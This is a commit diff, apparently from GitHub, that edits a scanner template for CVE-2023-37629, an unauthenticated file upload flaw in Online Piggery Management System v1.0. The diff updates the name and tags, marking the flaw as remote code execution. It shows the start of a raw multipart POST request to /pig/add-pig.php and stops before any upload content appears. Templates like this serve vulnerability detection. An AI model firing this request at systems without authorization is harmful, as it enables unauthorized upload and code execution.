info update

patch-1
Ritik Chaddha 2023-09-12 12:50:58 +05:30 committed by GitHub
parent 3518319d95
commit 74eff31e1d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 2 deletions

View File

@ -1,6 +1,7 @@
id: CVE-2023-37629
info:
name: Online Piggery Management System v1.0 - unauthenticated file upload
name: Online Piggery Management System v1.0 - Unauthenticated File Upload
author: Harsh
severity: critical
description: |
@ -15,7 +16,7 @@ info:
cwe-id: CWE-434
metadata:
verified: true
tags: fileupload,unauthenticated,exploitdb
tags: cve,cve2023,fileupload,rce,opms
http:
- raw:
@ -23,6 +24,7 @@ http:
POST /pig/add-pig.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="pigno"